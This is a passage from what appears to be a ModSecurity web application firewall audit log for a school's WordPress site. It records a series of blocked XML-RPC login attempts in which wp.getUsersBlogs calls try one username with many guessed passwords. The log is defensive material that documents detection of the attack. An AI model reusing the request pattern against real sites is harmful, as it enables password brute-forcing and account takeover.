X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dca1d43e-C-- wp.getUsersBlogs wakakur smkn22-jkt.sch --dca1d43e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dca1d43e-E-- --dca1d43e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069401317888 4981 (- - -) Stopwatch2: 1745069401317888 4981; combined=3705, p1=516, p2=3074, p3=0, p4=0, p5=69, sr=86, sw=46, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dca1d43e-Z-- --7ba6ba60-A-- [19/Apr/2025:20:31:05 +0700] aAOlmUruoUXZj665VUHxVwAAAMU 103.236.140.4 37974 103.236.140.4 8181 --7ba6ba60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ba6ba60-C-- wp.getUsersBlogs wakakur wakakur2019 --7ba6ba60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ba6ba60-E-- --7ba6ba60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069465114877 5608 (- - -) Stopwatch2: 1745069465114877 5608; combined=3989, p1=502, p2=3285, p3=0, p4=0, p5=115, sr=86, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ba6ba60-Z-- --33ef8d63-A-- [19/Apr/2025:20:32:07 +0700] aAOl10ruoUXZj665VUHxcgAAAMY 103.236.140.4 38260 103.236.140.4 8181 --33ef8d63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --33ef8d63-C-- wp.getUsersBlogs wakakur 1qazxsw2 --33ef8d63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33ef8d63-E-- --33ef8d63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069527393891 5583 (- - -) Stopwatch2: 1745069527393891 5583; combined=4002, p1=493, p2=3323, p3=0, p4=0, p5=108, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33ef8d63-Z-- --975ebd20-A-- [19/Apr/2025:20:33:08 +0700] aAOmFHNa4dA2HllpK_N3QwAAAIs 103.236.140.4 38540 103.236.140.4 8181 --975ebd20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --975ebd20-C-- wp.getUsersBlogs wakakur Beast3x@8*#4@! --975ebd20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --975ebd20-E-- --975ebd20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069588138396 17428 (- - -) Stopwatch2: 1745069588138396 17428; combined=27491, p1=472, p2=3427, p3=0, p4=0, p5=11811, sr=85, sw=93, l=0, gc=11688 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --975ebd20-Z-- --ee48ad11-A-- [19/Apr/2025:20:34:11 +0700] aAOmU0ruoUXZj665VUHxoAAAAMQ 103.236.140.4 38838 103.236.140.4 8181 --ee48ad11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ee48ad11-C-- wp.getUsersBlogs wakakur wakakur1989 --ee48ad11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee48ad11-E-- --ee48ad11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069651374523 5344 (- - -) Stopwatch2: 1745069651374523 5344; combined=4004, p1=466, p2=3323, p3=0, p4=0, p5=123, sr=88, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee48ad11-Z-- --70c23d07-A-- [19/Apr/2025:20:35:16 +0700] aAOmlEruoUXZj665VUHxrgAAAM0 103.236.140.4 39122 103.236.140.4 8181 --70c23d07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --70c23d07-C-- wp.getUsersBlogs wakakur qwertyuiop --70c23d07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70c23d07-E-- --70c23d07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069716557656 5256 (- - -) Stopwatch2: 1745069716557656 5256; combined=4152, p1=472, p2=3451, p3=0, p4=0, p5=137, sr=87, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70c23d07-Z-- --a42c9628-A-- [19/Apr/2025:20:36:16 +0700] aAOm0HNa4dA2HllpK_N3kgAAAIw 103.236.140.4 39406 103.236.140.4 8181 --a42c9628-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a42c9628-C-- wp.getUsersBlogs wakakur 789456 --a42c9628-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a42c9628-E-- --a42c9628-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069776205054 4616 (- - -) Stopwatch2: 1745069776205054 4616; combined=3441, p1=393, p2=2878, p3=0, p4=0, p5=99, sr=95, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a42c9628-Z-- --f1bfa413-A-- [19/Apr/2025:20:37:16 +0700] aAOnDEruoUXZj665VUHx8gAAAMs 103.236.140.4 39712 103.236.140.4 8181 --f1bfa413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f1bfa413-C-- wp.getUsersBlogs wakakur booboo --f1bfa413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1bfa413-E-- --f1bfa413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069836770034 5640 (- - -) Stopwatch2: 1745069836770034 5640; combined=3969, p1=446, p2=3139, p3=0, p4=0, p5=206, sr=88, sw=178, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1bfa413-Z-- --4900d161-A-- [19/Apr/2025:20:38:18 +0700] aAOnSg6cTFSgLAHl7PrTqQAAABQ 103.236.140.4 40000 103.236.140.4 8181 --4900d161-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4900d161-C-- wp.getUsersBlogs wakakur marina --4900d161-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4900d161-E-- --4900d161-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069898677592 5364 (- - -) Stopwatch2: 1745069898677592 5364; combined=3812, p1=490, p2=3145, p3=0, p4=0, p5=104, sr=86, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4900d161-Z-- --1ddc0e30-A-- [19/Apr/2025:20:39:24 +0700] aAOnjA6cTFSgLAHl7PrT2QAAABY 103.236.140.4 40318 103.236.140.4 8181 --1ddc0e30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1ddc0e30-C-- wp.getUsersBlogs wakakur Marketing2021 --1ddc0e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ddc0e30-E-- --1ddc0e30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069964079031 5141 (- - -) Stopwatch2: 1745069964079031 5141; combined=4082, p1=492, p2=3403, p3=0, p4=0, p5=109, sr=90, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ddc0e30-Z-- --f4b86d54-A-- [19/Apr/2025:20:40:24 +0700] aAOnyA6cTFSgLAHl7PrT7AAAAAU 103.236.140.4 40590 103.236.140.4 8181 --f4b86d54-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4b86d54-C-- wp.getUsersBlogs wakakur marketing2015_ --f4b86d54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4b86d54-E-- --f4b86d54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070024338664 5974 (- - -) Stopwatch2: 1745070024338664 5974; combined=4266, p1=527, p2=3432, p3=0, p4=0, p5=169, sr=98, sw=138, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4b86d54-Z-- --f8eab94a-A-- [19/Apr/2025:20:41:26 +0700] aAOoBnNa4dA2HllpK_N4KAAAAJg 103.236.140.4 40880 103.236.140.4 8181 --f8eab94a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f8eab94a-C-- wp.getUsersBlogs wakakur blessed1 --f8eab94a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8eab94a-E-- --f8eab94a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070086280868 5051 (- - -) Stopwatch2: 1745070086280868 5051; combined=3971, p1=480, p2=3301, p3=0, p4=0, p5=110, sr=87, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8eab94a-Z-- --439edc79-A-- [19/Apr/2025:20:42:28 +0700] aAOoREruoUXZj665VUHyJAAAANU 103.236.140.4 41164 103.236.140.4 8181 --439edc79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --439edc79-C-- wp.getUsersBlogs wakakur wakakur@1998 --439edc79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --439edc79-E-- --439edc79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070148449977 5540 (- - -) Stopwatch2: 1745070148449977 5540; combined=3961, p1=506, p2=3266, p3=0, p4=0, p5=110, sr=110, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --439edc79-Z-- --9eef1423-A-- [19/Apr/2025:20:43:32 +0700] aAOohHNa4dA2HllpK_N4hwAAAJM 103.236.140.4 41456 103.236.140.4 8181 --9eef1423-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9eef1423-C-- wp.getUsersBlogs wakakur wakakur@2004 --9eef1423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9eef1423-E-- --9eef1423-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070212752055 5459 (- - -) Stopwatch2: 1745070212752055 5459; combined=3842, p1=484, p2=3173, p3=0, p4=0, p5=107, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9eef1423-Z-- --ee948d27-A-- [19/Apr/2025:20:44:32 +0700] aAOowHNa4dA2HllpK_N4uQAAAJg 103.236.140.4 41744 103.236.140.4 8181 --ee948d27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ee948d27-C-- wp.getUsersBlogs wakakur tiffany --ee948d27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee948d27-E-- --ee948d27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070272209993 4278 (- - -) Stopwatch2: 1745070272209993 4278; combined=3248, p1=378, p2=2707, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee948d27-Z-- --1faa865c-A-- [19/Apr/2025:20:45:37 +0700] aAOpAUruoUXZj665VUHyfAAAANQ 103.236.140.4 42104 103.236.140.4 8181 --1faa865c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1faa865c-C-- wp.getUsersBlogs wakakur poopoo --1faa865c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1faa865c-E-- --1faa865c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070337257280 5568 (- - -) Stopwatch2: 1745070337257280 5568; combined=3862, p1=473, p2=3222, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity 